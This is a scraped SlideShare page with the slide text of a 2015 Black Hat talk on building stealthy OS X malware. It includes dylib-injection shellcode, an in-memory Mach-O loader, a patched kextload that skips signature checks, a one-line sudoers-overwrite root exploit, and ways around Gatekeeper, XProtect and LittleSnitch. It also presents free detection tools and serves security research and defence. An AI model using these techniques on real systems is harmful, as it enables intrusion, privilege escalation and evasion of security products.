SlideShare une entreprise Scribd logo

Black Hat '15: Writing Bad @$$ Malware for OS X

Synack
Synack

In comparison to Windows malware, known OS X threats are really quite lame. As an Apple user that has drank the 'Apple Juice,' I didn't think that was fair! From novel persistence techniques, to native OS X components that can be abused to thwart analysis, this talk will detail exactly how to create elegant, bad@ss OS X malware. And since detection is often a death knell for malware, the talk will also show how OS X's native malware mitigations and 3rd-party security tools were bypassed. For example I'll detail how Gatekeeper was remotely bypassed to allow unsigned download code to be executed, how Apple's 'rootpipe' patch was side-stepped to gain root on a fully patched system, and how all popular 3rd-party AV and personal firewall products were generically bypassed by my simple proof-of-concept malware. However, don't throw out your Macs just yet! The talk will conclude by presenting several free security tools that can generically detect or even prevent advanced OS X threats. Armed with such tools, we'll ensure that our computers are better protected against both current and future OS X malware. So unless you work for Apple, come learn how to take your OS X malware skills to the next level and better secure your Mac at the same time!

Technologie
1  sur  63
Télécharger pour lire hors ligne
@patrickwardle Writing Bad @$$ Malware for OS X
“leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, and infrastructure endpoints” WHOIS @patrickwardle    
this talk will cover… OUTLINE overview of os x malware bad @$$ malware defenses }bypassing pspspersistenceinfection self-defense features talk does not cover firmware or kernel-mode OS X malware (see: "Thunderstrike 2: Sith Strike")
OVERVIEW OF OS X MALWARE the status quo
macs are everywhere (home & enterprise) THE RISE OF MACS macs as % of total usa pc sales #3 usa / #5 worldwide vendor in pc shipments percentage 0 3.5 7 10.5 14 year '09 '10 '11 '12 '13 doesn’t  include  iDevices "Mac notebook sales have grown 21% over the last year, while total industry sales have fallen" -apple (3/2015)
but macs don’t get malware…right? MALWARE ON OS X? ‘first’ virus (elk cloner) infected apple II’s last 5 years; ~50 new 
 os x malware families “It doesn’t get PC viruses. A Mac isn’t susceptible to the thousands of viruses plaguing Windows-based computers.” -apple.com (2012) "[2014] nearly 1000 unique attacks on Macs; 25 major families" -kasperksy
__cstring:0000E910
 db  'clipboardd',0
 db  'com.apple.service.clipboardd.plist',0   db  '/Library/LaunchAgents',0     db  '<plist  version="1.0">',0Ah        '<key>RunAtLoad</key>',0Ah   provides reverse shell, keylogging, & screen capture OSX/XSLCMD “a previously unknown variant of the APT backdoor XSLCmd which is designed to compromise Apple OS X systems” -fireeye.com launch agent reverse shell keylogging screen capture OS X 10.9+ crashes
‘standard’ backdoor, providing survey, download/execute, etc. OSX/IWORM #  fs_usage  -­‐w  -­‐f  filesys   20:28:28.727871    open      /Library/LaunchDaemons/com.JavaW.plist                                               20:28:28.727890    write        B=0x16b                                                                                                         launch daemon survey download execute persisting infected torrents launch daemon plist
an iOS infector (via USB) OSX/WIRELURKER } contacts texts launch daemons survey} infected app(s)
 'Maiyadi App Store' infects connected iPhones “a collection of scripts, plists, & binaries all duct-taped together... making it easy to detect.” -j zdziarski
hackingteam's implant; collect all things! OSX/CRISIS (RCSMAC) launch agent rootkit component “There is nothing to be impressed from them from a technical point of view.” -@osxreverser persistence intelligence collection features
the current state of OS X malware THE (KNOWN) STATUS QUO persistence psp bypassself-defense features ‣ well known techniques ‣ majority: launch items ‣ minimal obfuscation ‣ no active self-defense ‣ inelegantly implemented ‣ suffice for the job ‣ no psp awareness ‣ no counter-measures “current OS X malware, while sufficient, is inelegant, amateur, and trivial to detect & prevent”grade: C+ stealth ‣ 'hide' in plain site ‣ stand-alone executables infection ‣ trojans ‣ phishing/old exploits
BAD @$$ OS X MALWARE current malware++
current methods are rather lame INITIAL INFECTION VECTOR(S) fake codecs fake installers/updates infected torrents/apps }protects dumb users Gatekeeper blocking untrusted code somewhat effective, but smart users should be ok.
a far better infection channel INFECTING SOFTWARE DOWNLOADS my dock MitM & infect non-SSL'd internet downloads HTTP :( still need to bypass GateKeeper... ;)
these should be secure, right!? INFECTING AV SOFTWARE DOWNLOADS all the security software I could find, was downloaded over HTTP! LittleSnitch Sophos } ClamXav
current methods are very lame PERSISTANCE launch items } login items persistence methods ‣ well known ‣ easily visible wirelurker's 4(!) launch daemons $  python  knockknock.py   com.apple.MailServiceAgentHelper   path:  /usr/bin/com.apple.MailServiceAgentHelper   com.apple.appstore.PluginHelper   path:  /usr/bin/com.apple.appstore.PluginHelper   periodicdate   path:  /usr/bin/periodicdate
 
 systemkeychain-­‐helper   path:  /usr/bin/systemkeychain-­‐helper MacProtector's login item
fairly stealthy & difficult to disinfect BINARY INFECTION? Process:                  Safari  [1599]   Path:                        Safari.app/Contents/MacOS/Safari   Exception  Type:    EXC_CRASH  (Code  Signature  Invalid)   Exception  Codes:  0x0000000000000000,  0x0000000000000000 OS loader verifies all signatures :( killed by the loader
the crypto seems solid, but what if it was gone? BINARY INFECTION? code signature :) #  md5  Safari.app/Contents/MacOS/Safari  -­‐>                633d043cf9742d6f0787acdee742c10d
 #  unsign.py  Safari.app/Contents/MacOS/Safari
    Safari  code  signature  removed
 
 #  md5  Safari.app/Contents/MacOS/Safari  -­‐>              825edd6a1e3aefa98d7cf99a60bac409
 
 $  open  /Applications/Safari.app  &&  ps  aux  |  grep  Safari      patrick    31337    /Applications/Safari.app  
self-contained somewhat difficult to detect (now), lots of options! PERSISTENCE VIA BINARY INFECTION add new LC_LOAD_DYLIB? hijack entry point? } difficult to disinfect! google 'OS.X/Boubou'
simply plant a dylib to win! DYLIB HIJACKING <blah>.dylib <blah>.dylib "I need <blah>.dylib" app dir "DLL Hijacking on OS X? #@%& Yeah!" DefCon (Sat, Aug 8th)
via Apple's PhotoStreamAgent ('iCloudPhotos.app') DYLIB HIJACKING PERSISTENCE configure hijacker against PhotoFoundation (dylib) copy to /Applications/iPhoto.app/Contents/ Library/LoginItems/PhotoFoundation.framework/ Versions/A/PhotoFoundation $  reboot     $  lsof  -­‐p  <pid  of  PhotoStreamAgent>   /Applications/iPhoto.app/Contents/Library/LoginItems/PhotoFoundation.framework/Versions/A/PhotoFoundation   /Applications/iPhoto.app/Contents/Frameworks/PhotoFoundation.framework/Versions/A/PhotoFoundation PhotoStreamAgent novel no new processes no binary/OS modifications } abuses legitimate functionality of OS X OS X El Capitan still 'hijackable'
currently, essentially non-existent SELF-DEFENSE 'hide' in plain sight } some crypto self-defense methods trivial to find trivial to analyze trivial to disinfect too easy for the AV companies!
abusing OS X's natively supported encryption ENCRYPTED MACH-O BINARIES //load  &  decrypt  segments   load_segment(...){      //decrypt  encrypted  segments      if(scp-­‐>flags  &  SG_PROTECTED_VERSION_1)    unprotect_dsmos_segment(scp-­‐>fileoff,  scp-­‐>filesize,  vp,                                                  pager_offset,  map,  map_addr,  map_size);     }
 //decrypt  chunk   unprotect_dsmos_segment(...){
    //function  pointer  to  decryption  routine      crypt_info.page_decrypt  =  dsmos_page_transform;
    //decrypt
    vm_map_apple_protected(map,  map_addr,  map_addr  +  map_size,  
                                                &crypt_info);
 } ourhardworkbythesewordsguar dedpleasedontsteal(c)AppleC algo: Blowfish (pre 10.6, AES) $  strings  -­‐a  myMalware     applicationDidFinishLaunching:   @"NSString"16@0:8   I  <3  BLACKHAT!   $  ./protect  myMalware    encrypting  'myMalware'   type:  CPU_TYPE_X86_64    encryption  complete   $  strings  -­‐a  myMalware  
 n^jd[P5{Q   r_`EYFaJq07 known malware: ~50% detection drop
tie to a specific target STRONGLY ENCRYPT YOUR MALWARE "environmental key generation towards clueless agents" "[the malware] tied the infection to the specific machine, and meant the payload couldn't be decrypted without knowing the NTFS object ID" 'equation group malware' N: environmental observation
 H: a one way (hash) function M: hash(es) H of observation N, needed for activation, carried by agent
 K: a key //at runtime if H(H(N)) = M then let K := H(N) } intended target any other
IN-MEMORY DECRYPTION & LOADING C&C server } custom in-memory loader? map image load dependencies link OS X supports in-memory loading! local file-system memory custom crypto, requires custom loader
dyld supports in-memory loading/linking IN-MEMORY MACH-O LOADING //vars   NSObjectFileImage  fileImage  =  NULL;   NSModule  module                          =  NULL;   NSSymbol  symbol                          =  NULL;   void  (*function)(const  char  *message);     //have  an  in-­‐memory  (file)  image  of  a  mach-­‐O  file  to  load/link   //  -­‐>note:  memory  must  be  page-­‐aligned  and  alloc'd  via  vm_alloc!
 //create  object  file  image
 NSCreateObjectFileImageFromMemory(codeAddr,  codeSize,  &fileImage);
 //link  module  
 module  =  NSLinkModule(fileImage,  "<anything>",  NSLINKMODULE_OPTION_PRIVATE);   //lookup  exported  symbol  (function)   symbol  =  NSLookupSymbolInModule(module,  "_"  "HelloBlackHat");
 //get  exported  function's  address
 function  =  NSAddressOfSymbol(symbol);
 //invoke  exported  function
 function("thanks  for  being  so  offensive  ;)"); loading a mach-O file from memory sample code released by apple (2005) 'MemoryBasedBundle' stealth++ no longer hosted
unlink dylibs to complicated detection 'HIDING' LOADED LIBRARIES struct  task_dyld_info  {     mach_vm_address_t   all_image_info_addr;       mach_vm_size_t        all_image_info_size;       integer_t                all_image_info_format;         };   struct  dyld_all_image_infos  {     uint32_t             version;         uint32_t             infoArrayCount;       const  struct  dyld_image_info*  infoArray;      ... remove from infoArray decrement infoArrayCount $  unlinkDylib   [+]  injected  into  1337,  unlinked  dylib:  /Users/patrick/hideMe.dylib     
 #  lldb  -­‐p  1337   (lldb)  image  list  |  hideMe.dylib   error:  the  target  has  no  matching  modules loaded dylib data structures to unlink unlinked dylib; hidden from lldb et. al. stealth++
other random ideas SELF DEFENSE prevent deletion? 'complicating' deletion #  chflags  schg  malware.dylib
 #  rm  malware.dylib   rm:  malware.dylib:  Operation  not  permitted "The schg flag can only be unset in single-user mode" self-monitoring? detect local access (dtrace) #  /usr/bin/opensnoop   0    90189  AVSCANNER      malware.dylib virusTotal 0 10 20 30 40 jan feb mar apr may detect detections google adwords? }
getting code into remote processes RUN-TIME PROCESS INJECTION newosxbook.com }mac hacker's handbook run-time injection mach_inject (PPC & i386) x86_64 no x86_64 :( buggy/broken :( (intentionally) at run-time, inject arbitrary dynamic libraries (dylibs) into arbitrary process the goal
determining target process' architecture RUN-TIME PROCESS INJECTION //check  if  remote  process  is  x86_64   BOOL  Is64Bit(pid_t  targetPID)   {          //info  struct          struct  proc_bsdshortinfo  procInfo;                    //get  proc  info          //  -­‐>assumes  valid  pid,  etc          proc_pidinfo(targetPID,  PROC_PIDT_SHORTBSDINFO,                                    0,  &procInfo,  PROC_PIDT_SHORTBSDINFO_SIZE);                    //'pbsi_flags'  has  a  64-­‐bit  mask          return  procInfo.pbsi_flags  &  PROC_FLAG_LP64;   } external process, architecture detection all 64-bit 32 3rd-party 32-bit google drive dropbox vpn apps 64 } }
//remote  library  loading  shellcode  (x86_64)     char  shellCode[]  =    "x90"                                                                                //  nop..    "x55"                                                                                //  pushq    %rbp    "x48x89xe5"                                                                //  movq      %rsp,  %rbp    "x48x83xecx20"                                                        //  subq      $32,  %rsp    "x89x7dxfc"                                                                //  movl      %edi,  -­‐4(%rbp)    "x48x89x75xf0"                                                        //  movq      %rsi,  -­‐16(%rbp)    "xb0x00"                                                                        //  movb      $0,  %al    
  //  call  pthread_set_self      "x48xbfx00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rdi    "x48xb8"  "_PTHRDSS"                                                  //  movabsq  $140735540045793,  %rax    "xffxd0"                                                                        //  callq    *%rax    "x48xbex00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rsi    "x48x8dx3dx2cx00x00x00"                                //  leaq      44(%rip),  %rdi    
  //  dlopen    "x48xb8"  "DLOPEN__"                                                  //  movabsq  $140735516395848,  %rax    "x48xbex00x00x00x00x00x00x00x00"        //  movabsq  $0,  %rsi    "xffxd0"                                                                        //  callq    *%rax        //  sleep(1000000)...    "x48xbfx00xe4x0bx54x02x00x00x00"        //  movabsq  $10000000000,  %rdi    "x48xb8"  "SLEEP___"                                                  //  movabsq  $140735516630165,  %rax    "xffxd0"                                                                        //  callq    *%rax    //  plenty  of  space  for  a  full  path  name  here    "LIBLIBLIBLIB"  "x00x00x00x00x00x00...."; target's process architecture RUN-TIME PROCESS INJECTION www.newosxbook.com 64 }addrs patched in at runtime
getting code into remote processes RUN-TIME PROCESS INJECTION task_for_pid() mach_vm_allocate() thread_create_running()mach_vm_write() vm_protect() task_for_pid() requires r00t
dylib injection (again) ftw! LOAD-TIME PROCESS INJECTION gain automatic & persistent code execution within a process only via a dynamic library hijack }no binary / OS file modifications no process monitoring no complex runtime injection no detection of injection <010>
into Apple's Xcode LOAD-TIME PROCESS INJECTION $  python  dylibHijackScanner.py     
 Xcode  is  vulnerable  (multiple  rpaths)   'binary':                '/Applications/Xcode.app/Contents/MacOS/Xcode'   'importedDylib':  '/DVTFoundation.framework/Versions/A/DVTFoundation'     'LC_RPATH':            '/Applications/Xcode.app/Contents/Frameworks' configure hijacker against DVTFoundation (dylib) copy to /Applications/Xcode.app/Contents/ Frameworks/DVTFoundation.framework/Versions/A/ do you trust your compiler now!? 
 (k thompson) Xcode
...starting with Apple's BYPASSING SECURITY PRODUCTS/TECHNOLOGIES xprotectgatekeeper os x sandbox code-signing ‘wins’ < so we’re all safe now, right?!? nope! }
allowing unsigned code to execute BYPASSING GATEKEEPER circumvent gatekeeper's draconic blockage via a dynamic library hijack the goal bypass this? gatekeeper in action
all files with quarantine attribute are checked HOW GATEKEEPER WORKS quarantine attributes //attributes   $  xattr  -­‐l  ~/Downloads/malware.dmg        com.apple.quarantine:0001;534e3038;      Safari;  B8E3DA59-­‐32F6-­‐4580-­‐8AB3...   safari, etc. tags downloaded content "Gatekeeper is an anti-malware feature of the OS X operating system. It allows users to restrict which sources they can install applications from, in order to reduce the likelihood of executing a Trojan horse" -apple.com
go home gatekeeper, you are drunk! GATEKEEPER BYPASS find an -signed or 'mac app store' app that contains an external relative reference to a hijackable dylib create a .dmg with the necessary folder structure to contain the malicious dylib in the externally referenced location #winning verified, so can't modify .dmg/.zip layout (signed) application <external>.dylib gatekeeper only verifies the app bundle!! not verified!
#winning GATEKEEPER BYPASS gatekeeper setting's (maximum) gatekeeper bypass :) unsigned (non-Mac App Store) code execution!! CVE 2015-3715 patched in OS X 10.10.4 standard alert still can bypass ;)
avoiding detection BYPASSING XPROTECT circumvent XProtect's malware detection so that malware can run in an uninhibited manner the goal bypass this? XProtect in action (flagging iWorm)
apple's built-in AV product is weak sauce BYPASSING XPROTECT XProtect signature file (iWorm) name hash file name } bypasses recompile write new ...or just rename!
decently secure, but lots of OS X bugs! ESCAPING THE OS X SANDBOX escape from the OS X sandbox to so that our malicious code can perform malicious actions. the goal user data system resources app sandboxed app 20+ bugs that could bypass the sandbox (‘project zero’) "Unauthorized Cross-App Resource Access on Mac OS X & iOS" [ bypasses ]
allowing unsigned kext to load BYPASSING KERNEL-MODE CODE SIGNING load malicious unsigned kexts into the kernel the goal bypass this? OS X kernel-mode signing checks
directly interface with the kernel BYPASSING KERNEL-MODE CODE SIGNING //unload  kext  daemon   #  launchctl  unload  /System/Library/LaunchDaemons/com.apple.kextd.plist   //load  (unsigned)  driver  with  custom  kext_load   #  ./patchedKextload  -­‐v  unsigned.kext
    Can't  contact  kextd;  attempting  to  load  directly  into  kernel   //profit  :)   #  kextstat  |  grep  -­‐i  unsigned      138        0  0xffffff7f82eeb000    com.synack.unsigned unsigned kext loading download kext_tools patch & recompile kextload loadKextsIntoKernel(KextloadArgs  *  toolArgs)
 {
    //sigResult  =  checkKextSignature(theKext,  0x1,  earlyBoot);      //always  OK!      sigResult  =  0;   } patched kextload
rootpipe reborn & more! NEED ROOT? copy Directory Utility to /tmp to get write permissions copy plugin (.daplugin) into Directory Utility's internal plugin directory execute Directory Utility evil plugin payload WriteConfig XPC service Dir. Utility $  ls  -­‐lart  /private/tmp   drwxr-­‐xr-­‐x    patrick    wheel      Directory  Utility.app "Stick That In Your (root)Pipe & Smoke It" 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s or, another bug (Stefan Esser) unpatched!
...and the rest (equally lame) BYPASSING SECURITY PRODUCTS LittleSnitch Sophos ClamXav } bypasses recompile write new behavioral based (firewall)
abusing trust to access the network BYPASSING LITTLESNITCH generically bypass LittleSnitch to allow malicious code to access the network in an uninhibited manner? the goal bypass this? LittleSnitch in action
load-time 'injection' into a trusted process LITTLE SNITCH BYPASS 0X1 $  python  dylibHijackScanner.py     
 GPG  Keychain  is  vulnerable  (weak/rpath'd  dylib)   'binary':                '/Applications/GPG  Keychain.app/Contents/MacOS/GPG  Keychain'   'weak  dylib':        '/Libmacgpg.framework/Versions/B/Libmacgpg'     'LC_RPATH':            '/Applications/GPG  Keychain.app/Contents/Frameworks' GPG Keychain LittleSnitch rule for GPG Keychain got 99 problems but LittleSnitch ain't one ;)
more generically, via iCloud LITTLE SNITCH BYPASS 0X2 iCloud un-deletable system rule: "anybody can talk to iCloud" LittleSnitch's iCloud rule o rly!?...yes!
putting some pieces all together SIMPLE END-TO-END ATTACK persist exfil file download & execute cmd persistently install a malicious dylib as a hijacker upload a file ('topSecret') to a remote iCloud account download and run a command ('Calculator.app') doesn't require r00t!
ClamXav LittleSnitch Sophos the AV industry vs me ;) PSP TESTING are these blocked? persist exfil file download & execute cmd OS X 'security' products
DEFENSE free os x security tools
MY CONUNDRUM …I love my mac, but it's so easy to hack "No one is going to provide you a quality service for nothing. If you’re not paying, you’re the product." -unnamed AV company ha, BULLSHIT! + I should write some OS X security tools to protect my Mac ....and share 'em freely :)
free OS X tools & malware samples OBJECTIVE-SEE malware samples :) KnockKnock BlockBlock TaskExplorer
KNOCKKNOCK UI detecting persistence: now an app for that! KnockKnock (UI)
KNOCKKNOCK UI VirusTotal integration detect submit rescan results VirusTotal integrations
BLOCKBLOCK a 'firewall' for persistence locations status bar BlockBlock, block blocking :) HackingTeam's OS X implant "0-day bug hijacks Macs" (payload)
TASKEXPLORER explore all running tasks (processes) '#' filters signing virus total dylibs files network
EL CAPITAN (OS X 10.11) next version of OS X to keep us all safe? System  Integrity  Protection
 "A  new  security  policy  that  applies  to  every  running  process,  including   privileged  code  and  code  that  runs  out  of  the  sandbox.  The  policy  extends   additional  protections  to  components  on  disk  and  at  run-­‐time,  only   allowing  system  binaries  to  be  modified  by  the  system  installer  and   software  updates.  Code  injection  and  runtime  attachments  to  system   binaries  are  no  longer  permitted."  -­‐apple.com "rootless" iWorm vs. OS X 10.11 (beta 5)"wut!?" the test:
CONCLUSIONS some key takeaways... bypassing pspspersistenceinfection self-defense features improve the malwarez current OS X malware is lame; leading to complacent security products! think differently
QUESTIONS & ANSWERS patrick@synack.com @patrickwardle feel free to contact me any time! "What if every country has ninjas, but we only know about the Japanese ones because they’re rubbish?" -DJ-2000, reddit.com final thought ;) "Objective-See's OS X Security Tools" Blackhat Arsenal (tomorrow, 15:30 - 18:00) syn.ac/BlackhatMalware
credits - thezooom.com - deviantart.net - iconmonstr.com - flaticon.com images - @osxreverser - http://reverse.put.as/Hitcon_2012_Presentation.pdf - https://www.syscan.org/index.php/download/get/9ee8ed70ddcb2d53169b2420f2fa286e/ SyScan15%20Pedro%20Vilaca%20-%20BadXNU%20a%20rotten%20apple - https://reverse.put.as/2013/11/23/breaking-os-x-signed-kernel-extensions-with-a-nop/
 - www.newosxbook.com - mac hacker's handbook talks/books

Recommandé

Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration TestingSubho Halder
 
Getting started with Android pentesting
Getting started with Android pentestingGetting started with Android pentesting
Getting started with Android pentestingMinali Arora
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Ajin Abraham
 
CYBER CRIME.pptx
CYBER CRIME.pptxCYBER CRIME.pptx
CYBER CRIME.pptxSonuRoy30
 
Android pentesting
Android pentestingAndroid pentesting
Android pentestingMykhailo Antonishyn
 
Android pentesting the hackers-meetup
Android pentesting the hackers-meetupAndroid pentesting the hackers-meetup
Android pentesting the hackers-meetupkunwaratul hax0r
 
iOS Application Pentesting
iOS Application PentestingiOS Application Pentesting
iOS Application Pentestingn|u - The Open Security Community
 
Computer viruses
Computer virusesComputer viruses
Computer virusesAlfred George
 

Recommandé

Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration TestingSubho Halder
 
Getting started with Android pentesting
Getting started with Android pentestingGetting started with Android pentesting
Getting started with Android pentestingMinali Arora
 
Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Automated Security Analysis of Android & iOS Applications with Mobile Securit...
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Ajin Abraham
 
CYBER CRIME.pptx
CYBER CRIME.pptxCYBER CRIME.pptx
CYBER CRIME.pptxSonuRoy30
 
Android pentesting
Android pentestingAndroid pentesting
Android pentestingMykhailo Antonishyn
 
Android pentesting the hackers-meetup
Android pentesting the hackers-meetupAndroid pentesting the hackers-meetup
Android pentesting the hackers-meetupkunwaratul hax0r
 
iOS Application Pentesting
iOS Application PentestingiOS Application Pentesting
iOS Application Pentestingn|u - The Open Security Community
 
Computer viruses
Computer virusesComputer viruses
Computer virusesAlfred George
 
Key logger,Why? and How to prevent Them?
Key logger,Why? and How to prevent Them?Key logger,Why? and How to prevent Them?
Key logger,Why? and How to prevent Them?Bibek Sharma
 
Presentation on virus
Presentation on virusPresentation on virus
Presentation on virusProtik Roy
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentestingn|u - The Open Security Community
 
iOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3miOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3mPrem Kumar (OSCP)
 
Android pentesting
Android pentestingAndroid pentesting
Android pentestingMykhailo Antonishyn
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration TestingBGA Cyber Security
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavRomansh Yadav
 
Burp Extender API for Penetration Testing
Burp Extender API for Penetration TestingBurp Extender API for Penetration Testing
Burp Extender API for Penetration TestingPichaya Morimoto
 
iOS Application Exploitation
iOS Application ExploitationiOS Application Exploitation
iOS Application ExploitationPositive Hack Days
 
Mobile Security at OWASP - MASVS and MSTG
Mobile Security at OWASP - MASVS and MSTGMobile Security at OWASP - MASVS and MSTG
Mobile Security at OWASP - MASVS and MSTGRomuald SZKUDLAREK
 
Mobile Application Security Testing (Static Code Analysis) of Android App
Mobile Application Security Testing (Static Code Analysis) of Android AppMobile Application Security Testing (Static Code Analysis) of Android App
Mobile Application Security Testing (Static Code Analysis) of Android AppAbhilash Venkata
 
Types of malware
Types of malwareTypes of malware
Types of malwaretechexpert2345
 
Cusomizing Burp Suite - Getting the Most out of Burp Extensions
Cusomizing Burp Suite - Getting the Most out of Burp ExtensionsCusomizing Burp Suite - Getting the Most out of Burp Extensions
Cusomizing Burp Suite - Getting the Most out of Burp ExtensionsAugust Detlefsen
 
Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static AnalysisHossein Yavari
 
Pentesting Android Applications
Pentesting Android ApplicationsPentesting Android Applications
Pentesting Android ApplicationsCláudio André
 
Android Penetration testing - Day 2
Android Penetration testing - Day 2 Android Penetration testing - Day 2
Android Penetration testing - Day 2Mohammed Adam
 
Informe De Virus Y Antivirus
Informe De Virus Y AntivirusInforme De Virus Y Antivirus
Informe De Virus Y Antivirusrelajacion
 
malware analysis
malware analysismalware analysis
malware analysis20CS201AkashR
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAjin Abraham
 
iOS Application Security
iOS Application SecurityiOS Application Security
iOS Application SecurityEgor Tolstoy
 
DLL Hijacking on OS X
DLL Hijacking on OS XDLL Hijacking on OS X
DLL Hijacking on OS XSynack
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperSynack
 

Contenu connexe

Tendances

Key logger,Why? and How to prevent Them?
Key logger,Why? and How to prevent Them?Key logger,Why? and How to prevent Them?
Key logger,Why? and How to prevent Them?Bibek Sharma
 
Presentation on virus
Presentation on virusPresentation on virus
Presentation on virusProtik Roy
 
iOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3miOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3mPrem Kumar (OSCP)
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration TestingBGA Cyber Security
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavRomansh Yadav
 
Burp Extender API for Penetration Testing
Burp Extender API for Penetration TestingBurp Extender API for Penetration Testing
Burp Extender API for Penetration TestingPichaya Morimoto
 
Mobile Security at OWASP - MASVS and MSTG
Mobile Security at OWASP - MASVS and MSTGMobile Security at OWASP - MASVS and MSTG
Mobile Security at OWASP - MASVS and MSTGRomuald SZKUDLAREK
 
Mobile Application Security Testing (Static Code Analysis) of Android App
Mobile Application Security Testing (Static Code Analysis) of Android AppMobile Application Security Testing (Static Code Analysis) of Android App
Mobile Application Security Testing (Static Code Analysis) of Android AppAbhilash Venkata
 
Cusomizing Burp Suite - Getting the Most out of Burp Extensions
Cusomizing Burp Suite - Getting the Most out of Burp ExtensionsCusomizing Burp Suite - Getting the Most out of Burp Extensions
Cusomizing Burp Suite - Getting the Most out of Burp ExtensionsAugust Detlefsen
 
Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static AnalysisHossein Yavari
 
Pentesting Android Applications
Pentesting Android ApplicationsPentesting Android Applications
Pentesting Android ApplicationsCláudio André
 
Android Penetration testing - Day 2
Android Penetration testing - Day 2 Android Penetration testing - Day 2
Android Penetration testing - Day 2Mohammed Adam
 
Informe De Virus Y Antivirus
Informe De Virus Y AntivirusInforme De Virus Y Antivirus
Informe De Virus Y Antivirusrelajacion
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAjin Abraham
 
iOS Application Security
iOS Application SecurityiOS Application Security
iOS Application SecurityEgor Tolstoy
 

Tendances (20)

Key logger,Why? and How to prevent Them?
Key logger,Why? and How to prevent Them?Key logger,Why? and How to prevent Them?
Key logger,Why? and How to prevent Them?
 
Presentation on virus
Presentation on virusPresentation on virus
Presentation on virus
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 
iOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3miOS-Application-Security-iAmPr3m
iOS-Application-Security-iAmPr3m
 
Android pentesting
Android pentestingAndroid pentesting
Android pentesting
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration Testing
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
 
Burp Extender API for Penetration Testing
Burp Extender API for Penetration TestingBurp Extender API for Penetration Testing
Burp Extender API for Penetration Testing
 
iOS Application Exploitation
iOS Application ExploitationiOS Application Exploitation
iOS Application Exploitation
 
Mobile Security at OWASP - MASVS and MSTG
Mobile Security at OWASP - MASVS and MSTGMobile Security at OWASP - MASVS and MSTG
Mobile Security at OWASP - MASVS and MSTG
 
Mobile Application Security Testing (Static Code Analysis) of Android App
Mobile Application Security Testing (Static Code Analysis) of Android AppMobile Application Security Testing (Static Code Analysis) of Android App
Mobile Application Security Testing (Static Code Analysis) of Android App
 
Types of malware
Types of malwareTypes of malware
Types of malware
 
Cusomizing Burp Suite - Getting the Most out of Burp Extensions
Cusomizing Burp Suite - Getting the Most out of Burp ExtensionsCusomizing Burp Suite - Getting the Most out of Burp Extensions
Cusomizing Burp Suite - Getting the Most out of Burp Extensions
 
Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static Analysis
 
Pentesting Android Applications
Pentesting Android ApplicationsPentesting Android Applications
Pentesting Android Applications
 
Android Penetration testing - Day 2
Android Penetration testing - Day 2 Android Penetration testing - Day 2
Android Penetration testing - Day 2
 
Informe De Virus Y Antivirus
Informe De Virus Y AntivirusInforme De Virus Y Antivirus
Informe De Virus Y Antivirus
 
malware analysis
malware analysismalware analysis
malware analysis
 
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSFAppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
AppSec EU 2016: Automated Mobile Application Security Assessment with MobSF
 
iOS Application Security
iOS Application SecurityiOS Application Security
iOS Application Security
 

En vedette

DLL Hijacking on OS X
DLL Hijacking on OS XDLL Hijacking on OS X
DLL Hijacking on OS XSynack
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperSynack
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
